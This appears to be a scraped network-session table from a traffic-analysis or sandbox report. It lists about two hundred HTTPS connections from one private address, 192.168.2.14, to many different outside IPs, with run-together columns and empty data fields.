                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18097192.168.2.1455446102.130.39.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18098192.168.2.143820643.49.102.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18099192.168.2.1438684138.125.171.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18100192.168.2.1454374182.75.215.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18101192.168.2.1453572159.237.116.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18102192.168.2.1432982182.167.215.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18103192.168.2.144534646.93.70.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18104192.168.2.145171880.194.31.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18105192.168.2.1446532220.209.230.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18106192.168.2.1443222138.229.46.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18107192.168.2.1452884157.156.114.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18108192.168.2.1459620199.1.22.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18109192.168.2.1437042211.244.48.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18110192.168.2.1457110176.239.191.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18111192.168.2.145662618.85.82.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18112192.168.2.144189444.131.8.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18113192.168.2.1460936136.1.197.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18114192.168.2.145095244.52.87.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18115192.168.2.1449094196.34.175.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18116192.168.2.1432870186.122.138.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18117192.168.2.1436420221.101.56.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18118192.168.2.1458510205.128.31.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18119192.168.2.1436596150.248.150.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18120192.168.2.143312423.146.242.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18121192.168.2.1452240135.62.252.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18122192.168.2.1440656155.1.146.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18123192.168.2.143873048.251.45.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18124192.168.2.1438932199.109.141.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18125192.168.2.1450620114.122.221.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18126192.168.2.1455924123.54.136.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18127192.168.2.1450436149.228.239.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18128192.168.2.1459018111.106.111.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18129192.168.2.143695851.245.157.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18130192.168.2.1441366143.110.67.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18131192.168.2.144882890.116.246.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18132192.168.2.144739454.12.226.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18133192.168.2.1454926174.225.15.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18134192.168.2.143379277.140.20.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18135192.168.2.1439328179.112.3.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18136192.168.2.145490891.4.153.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18137192.168.2.1439002160.246.211.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18138192.168.2.1437068141.240.103.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18139192.168.2.145054083.91.112.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18140192.168.2.1451292191.161.25.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18141192.168.2.1456042118.84.80.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18142192.168.2.145348414.175.63.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18143192.168.2.144313293.237.59.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18144192.168.2.1438346210.248.121.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18145192.168.2.144814274.18.90.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18146192.168.2.1458962133.178.140.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18147192.168.2.144343213.13.144.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18148192.168.2.1451958123.203.103.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18149192.168.2.1448954155.0.195.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18150192.168.2.1458970155.54.92.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18151192.168.2.144823470.100.214.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18152192.168.2.143718262.97.242.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18153192.168.2.145650284.179.92.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18154192.168.2.1451832122.234.134.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18155192.168.2.1445258123.1.222.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18156192.168.2.1440504139.201.112.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18157192.168.2.1444414158.108.148.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18158192.168.2.1436592184.23.59.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18159192.168.2.1443128112.155.27.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18160192.168.2.143752267.119.188.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18161192.168.2.145961268.154.26.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18162192.168.2.1434262196.35.81.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18163192.168.2.1460224118.42.98.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18164192.168.2.1435136187.152.217.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18165192.168.2.1437636134.78.229.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18166192.168.2.1452824200.73.138.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18167192.168.2.144550444.31.129.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18168192.168.2.145780632.63.245.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18169192.168.2.145013491.238.123.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18170192.168.2.1441206193.249.70.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18171192.168.2.1441974165.210.116.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18172192.168.2.1453326223.142.32.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18173192.168.2.1455240187.214.234.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18174192.168.2.1458674186.121.169.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18175192.168.2.1458078135.26.237.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18176192.168.2.1458176142.140.229.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18177192.168.2.145084047.153.34.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18178192.168.2.1445986197.106.185.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18179192.168.2.1433370120.159.97.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18180192.168.2.145994042.128.87.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18181192.168.2.143396464.117.238.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18182192.168.2.143611240.32.136.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18183192.168.2.145417418.196.109.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18184192.168.2.143469296.8.25.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18185192.168.2.1437030130.44.244.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18186192.168.2.144283887.83.217.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18187192.168.2.144719432.135.44.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18188192.168.2.1441090156.83.50.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18189192.168.2.1435712187.201.132.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18190192.168.2.143693032.213.113.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18191192.168.2.145804265.231.53.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18192192.168.2.143597620.214.115.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18193192.168.2.1438668213.63.43.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18194192.168.2.1458132142.179.139.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18195192.168.2.1453892126.74.136.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18196192.168.2.1460010159.219.130.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18197192.168.2.1442208116.130.91.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18198192.168.2.145268694.80.67.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18199192.168.2.1453500203.242.83.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18200192.168.2.1447674148.229.176.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18201192.168.2.14550049.153.34.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18202192.168.2.143438898.198.106.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18203192.168.2.1435666102.126.246.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18204192.168.2.1450598116.32.5.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18205192.168.2.144649093.44.228.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18206192.168.2.14372444.201.81.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18207192.168.2.1444004173.125.153.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18208192.168.2.1456684113.195.75.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18209192.168.2.1436468166.159.123.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18210192.168.2.144177278.111.230.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18211192.168.2.1454978149.203.9.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18212192.168.2.1456852133.39.97.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18213192.168.2.1442292180.155.213.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18214192.168.2.1459816138.7.220.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18215192.168.2.1452848188.86.222.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18216192.168.2.144389471.74.85.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18217192.168.2.1439126189.224.205.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18218192.168.2.1452018114.65.22.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18219192.168.2.1451466218.135.167.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18220192.168.2.143805294.215.222.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18221192.168.2.1453136164.159.142.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18222192.168.2.144894478.2.141.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18223192.168.2.14516064.225.207.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18224192.168.2.143850663.61.162.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18225192.168.2.1439366187.156.134.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18226192.168.2.14386984.96.193.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18227192.168.2.1438604206.32.180.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18228192.168.2.144557493.199.23.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18229192.168.2.1447964204.98.190.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18230192.168.2.1445156128.26.161.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18231192.168.2.145630664.56.166.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18232192.168.2.144903868.255.53.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18233192.168.2.14408385.100.85.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18234192.168.2.144844099.189.149.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18235192.168.2.1436450208.141.9.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18236192.168.2.1436738213.235.13.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18237192.168.2.1442230194.22.11.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18238192.168.2.1458570160.120.202.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18239192.168.2.143856841.81.88.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18240192.168.2.1455574150.182.248.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18241192.168.2.1459658123.111.148.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18242192.168.2.145741852.121.229.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18243192.168.2.14427129.130.223.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18244192.168.2.145521698.121.169.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18245192.168.2.143347083.44.41.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18246192.168.2.1432866179.167.60.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18247192.168.2.1439144130.22.124.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18248192.168.2.1453546188.148.175.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18249192.168.2.1457476200.130.72.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18250192.168.2.143825469.4.139.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18251192.168.2.1454282169.148.169.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18252192.168.2.1443984212.157.105.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18253192.168.2.145967646.245.191.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18254192.168.2.1458192140.131.7.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18255192.168.2.144445294.22.252.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18256192.168.2.143927213.101.221.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18257192.168.2.143301284.52.76.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18258192.168.2.1437514153.191.76.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18259192.168.2.144760437.52.100.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18260192.168.2.1438364114.58.74.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18261192.168.2.144437060.68.160.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18262192.168.2.143665031.71.50.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18263192.168.2.1455816197.3.99.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18264192.168.2.144806897.234.80.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18265192.168.2.145650844.31.190.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18266192.168.2.145860420.251.127.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18267192.168.2.1460108205.83.159.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18268192.168.2.1445344153.233.72.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18269192.168.2.1453148187.205.192.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18270192.168.2.1447384152.132.222.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18271192.168.2.1435574222.40.103.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18272192.168.2.1449232154.210.228.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18273192.168.2.144967034.164.158.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18274192.168.2.145551854.15.114.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18275192.168.2.144869259.232.116.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18276192.168.2.1439878178.23.151.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18277192.168.2.1440574129.186.81.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18278192.168.2.143554039.28.48.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18279192.168.2.1453386132.201.255.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18280192.168.2.1459818177.58.145.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18281192.168.2.1460906158.19.167.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18282192.168.2.1443264138.240.252.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18283192.168.2.144467064.36.94.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18284192.168.2.146056882.164.153.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18285192.168.2.14539525.171.111.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18286192.168.2.1440600211.17.67.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18287192.168.2.1438744211.88.16.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18288192.168.2.1434132197.240.186.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18289192.168.2.1444814141.70.60.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18290192.168.2.145007432.2.29.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18291192.168.2.143901858.246.17.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18292192.168.2.145534477.11.110.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18293192.168.2.1433826188.14.232.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18294192.168.2.14555861.26.148.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18295192.168.2.1433958101.156.210.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18296192.168.2.143927282.75.41.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18297192.168.2.1446010138.82.156.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18298192.168.2.1439438107.178.247.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18299192.168.2.1434996114.177.59.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18300192.168.2.1439992222.127.101.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18301192.168.2.1458764124.237.141.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18302192.168.2.144599046.53.28.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18303192.168.2.1439338202.243.6.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18304192.168.2.145061870.103.174.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18305192.168.2.1445440151.38.4.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18306192.168.2.1436046104.27.45.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18307192.168.2.145807851.115.198.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18308192.168.2.1448446121.162.160.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18309192.168.2.1456604182.79.145.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18310192.168.2.14394625.26.82.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18311192.168.2.1447444154.14.221.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18312192.168.2.1453664139.203.27.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18313192.168.2.1456536192.95.192.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18314192.168.2.1457068106.200.160.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18315192.168.2.1455824143.205.115.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18316192.168.2.145681632.42.156.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18317192.168.2.1451928177.35.123.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
